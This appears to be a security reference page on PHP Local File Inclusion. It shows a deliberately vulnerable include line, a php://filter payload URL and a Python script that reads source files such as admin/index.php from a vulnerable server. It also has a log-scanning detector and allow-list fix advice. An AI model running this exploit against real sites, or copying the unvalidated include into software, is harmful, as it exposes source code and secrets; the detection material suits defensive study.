Local File Inclusion (PHP)
Example of Local File Inclusion
include($_GET["file"]);
This code includes in the response a file controlled by a request argument. PHP code in the included file is interpreted by default.
Read PHP source
To avoid interpreting the included PHP, we can pass php://filter/convert.base64-encode/resource=path/to/file as the file to include; the response then contains the base64-encoded page instead.
Examples:
http://www.example.com/vuln.php?file=php://filter/convert.base64-encode/resource=vuln.php
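import base64
import os

import requests

# Paths to read, relative to the vulnerable script
files = [
    'index.php',
    'admin/index.php',
]
URL_VULN = "http://www.example.com/vuln.php"
ARG = "file"


def extract_b64(html):
    """ Extract the b64 from the response.

    Assumes the body holds only the encoded file; adapt this to the
    page layout if the include is wrapped in other HTML.
    """
    return html.strip()


for file in files:
    payload = {
        ARG: f"php://filter/convert.base64-encode/resource={file}"
    }
    response = requests.get(URL_VULN, params=payload)
    # Pass the body text, not the Response object
    file_b64 = extract_b64(response.text)
    file_content = base64.b64decode(file_b64)
    # Create local sub-directories such as admin/ before writing
    os.makedirs(os.path.dirname(file) or ".", exist_ok=True)
    with open(file, 'bw') as f:
        f.write(file_content)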
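
Detecting these requests
Requests like the ones above leave the php://filter wrapper in the query string of the web server access log. The following is an added example, not part of the original page: it scans access-log lines for php://filter reads in any query parameter and reports which file was requested. The log lines, the combined-log layout and the function names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?file=php://filter/convert.base64-encode/resource=vuln.php HTTP/1.1" 200 1520
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /vuln.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dadmin%2Findex.php HTTP/1.1" 200 2048
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /vuln.php?file=contact.php HTTP/1.1" 200 512
198.51.100.9 - - [10/Oct/2023:13:57:12 +0000] "GET /vuln.php?file=PHP%253A%252F%252Ffilter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 1800
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Matched case-insensitively; captures whatever follows the first resource=
WRAPPER_RE = re.compile(r'^\s*php://filter\b.*?resource=(.*)$', re.I | re.S)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so layered encoding cannot hide the wrapper."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_filter_reads(log_text):
    """Return (client, parameter, requested file) for each php://filter read."""
    hits = []
    for line in log_text.splitlines():
        request = REQUEST_RE.search(line)
        if not request:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(request.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            match = WRAPPER_RE.match(fully_unquote(value))
            if match:
                hits.append((client, name, match.group(1)))
    return hits


if __name__ == "__main__":
    for client, name, target in find_filter_reads(SAMPLE_LOG):
        print(f"{client} read {target!r} through parameter {name!r}")
```

A hit means the parameter value reached include() unvalidated or was at least probed; the fix on the PHP side is to map the argument to a fixed list of allowed files rather than passing it to include() directly.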